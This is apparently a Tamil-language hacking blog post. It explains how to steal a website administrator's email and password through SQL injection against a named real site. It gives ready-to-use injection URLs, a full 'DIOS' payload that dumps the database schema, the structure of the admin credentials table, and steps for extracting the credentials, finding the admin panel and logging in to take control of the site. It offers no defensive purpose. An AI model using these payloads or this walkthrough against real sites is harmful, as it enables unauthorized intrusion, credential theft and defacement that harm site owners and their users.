Website Admin-ன் Email&Password-ஐ Hack செய்வது எப்படி?

இன்று நாம் ஒரு Website-ல் உள்ள Admin-ன் Email&Password ஆகியவற்றை எடுத்து அதன் மூலம் அந்த Website-ன் Full access-ஐ பெறுவது என்று பார்ப்போம்


TargetSite http://www.coreworld.in/
இந்த site-ல் SQli vuln உள்ளது.  Site-ல் 5 columns உள்ளது  http://www.coreworld.in/news.php?id=382+ORDER+BY+5--+
http://www.coreworld.in/news.php?id=-382+UNION+ALL+SELECT+1,2,3,4,5--+

Vuln Columns-ஐ கண்டறிய  http://www.coreworld.in/news.php?id=--382+UNION+ALL+SELECT+1,2,3,4,5--+ இப்போது 2,3 Vuln Columns ஆகும்.
இப்பொது நாம் Admin Email&Password-ஐ எடுக்க DIOS Method-ஐ பயன்படுத்தலாம். http://www.coreworld.in/news.php?id=-382+UNION+ALL+SELECT+1,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),3,4,5--+
 DIOS Method-ஐ Execute செய்தவுடன்  மொத்த DATABASE-ம் காட்டும். அதில் admin login என்ற Table இருக்கும். அதில் தான் admin-ன் ID&PWD இருக்கும்.


01:) id
02:) emailid
03:) ipassword
04:) istatus

இப்பொது நாம் அதில் உள்ள DATA-வை Extract செய்து ID&PWD எடுக்க, HACKBAR-ல் DATA என்ற option-ல்>DATA group_concat என்பதை Injection point-ல் உள்ளிடவும்.(Injection Point என்பது VULN Column) Execute கொடுக்கவும்.


 முதலில் ஒரு pop-ல் DATABASE என்றே கொடுக்கவும்.

அடுத்த pop-ல் Table Name கேக்கும் அதில் நமக்கு தேவையான admin-ன் Column-ஐ கொடுக்கவும்.

அடுத்த pop-ல் தேவையான Columns ID&PWD Column Name-ஐ கொடுக்கவும்.
 இப்பொது Execute செய்யவும். admin-ன் ID&PWD காட்டபடும்.


சரி இப்போது நாம் Admin-ன் ID&PWD எடுத்து விட்டோம். அடுத்தது admin login செய்யும்  admin Panel தேவை. அதை கண்டறிய website-ன் link வுடன் admin அல்லது adminlogin என சேர்த்து பார்த்தால் ADMIN PANEL கிடைகும். Admin Panel-எடுப்பதை பற்றி அடுத்த பதிவில் பார்க்கலாம்.
http://www.coreworld.in/admin
http://www.coreworld.in/adminlogin 

இப்போது நமக்கு Admin ID&PWD கிடைத்துவிட்டது. Admin Panel-வும் கிடைத்து விட்டது. Login-ல் ID&PWD கொடுத்து விட்டால் Site-ன் உள்நுழைந்து விடும் 

இனி நமக்கு தேவையான மாற்றங்களை நாம் செய்யலாம்.
                 
                விரிவாக தெரிந்து கொள்ள Video-ஐ பார்க்கவும்


  

No comments